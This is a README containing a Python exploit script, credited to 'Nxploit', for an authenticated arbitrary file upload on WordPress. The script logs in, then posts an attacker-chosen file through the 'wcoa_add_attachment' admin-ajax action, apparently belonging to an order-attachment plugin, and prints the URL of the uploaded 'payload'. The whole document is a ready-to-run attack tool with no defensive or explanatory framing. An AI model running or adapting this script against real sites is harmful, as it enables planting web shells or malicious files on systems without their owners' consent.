README.md
Rendering markdown...
import requests
import argparse
import json
import os
# exploit by | Nxploit | Khaled alenazi
requests.packages.urllib3.disable_warnings()
USER_AGENT = "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0"
def authenticate(session, url, username, password):
login_url = url + "/wp-login.php"
login_data = {
"log": username,
"pwd": password,
"rememberme": "forever",
"wp-submit": "Log In"
}
print("[*] Initiating authentication...")
response = session.post(login_url, data=login_data, verify=False, headers={"User-Agent": USER_AGENT})
if any("wordpress_logged_in" in cookie.name for cookie in session.cookies):
print("[✔] Authentication successful.")
return True
else:
print("[✘] Authentication failed.")
return False
def validate_file(file_path):
if not os.path.exists(file_path):
print(f"[✘] Error: File '{file_path}' not found!")
exit()
def execute_payload(session, url, order_id, file_path, filetype):
upload_url = url + "/wp-admin/admin-ajax.php"
files = {
"attachment": (file_path, open(file_path, "rb"), filetype)
}
data = {
"action": "wcoa_add_attachment",
"order_id": order_id
}
print(f"[*] Deploying payload: {file_path} to order {order_id}...")
response = session.post(upload_url, files=files, data=data, verify=False, headers={"User-Agent": USER_AGENT})
return response
def analyze_response(response):
if response.status_code == 200:
try:
response_json = response.json()
if response_json.get("status") == "success":
file_url = response_json["data"].get("url", "Unknown")
print(f"[✔] Payload successfully deployed!")
print(f"🔗 File URL: {file_url}")
else:
print("[✘] Deployment failed.")
except json.JSONDecodeError:
print("[✘] Failed to parse JSON response.")
else:
print(f"[✘] Deployment failed! HTTP Status: {response.status_code}")
def main():
parser = argparse.ArgumentParser(description="WordPress File Upload via wcoa_add_attachment")
parser.add_argument("-u", "--url", required=True, help="Target WordPress site URL (e.g., http://example.com/wordpress4)")
parser.add_argument("-un", "--username", required=True, help="WordPress username")
parser.add_argument("-p", "--password", required=True, help="WordPress password")
parser.add_argument("-o", "--order", default="196", help="Order ID to attach the file (default: 196)")
parser.add_argument("--filename", default="Nxploit.jpg", help="File name to upload (default: Nxploit.jpg)")
parser.add_argument("--filetype", default="image/jpeg", help="MIME type of the file (default: image/jpeg)")
args = parser.parse_args()
session = requests.Session()
if not authenticate(session, args.url, args.username, args.password):
exit()
validate_file(args.filename)
response = execute_payload(session, args.url, args.order, args.filename, args.filetype)
analyze_response(response)
if __name__ == "__main__":
main()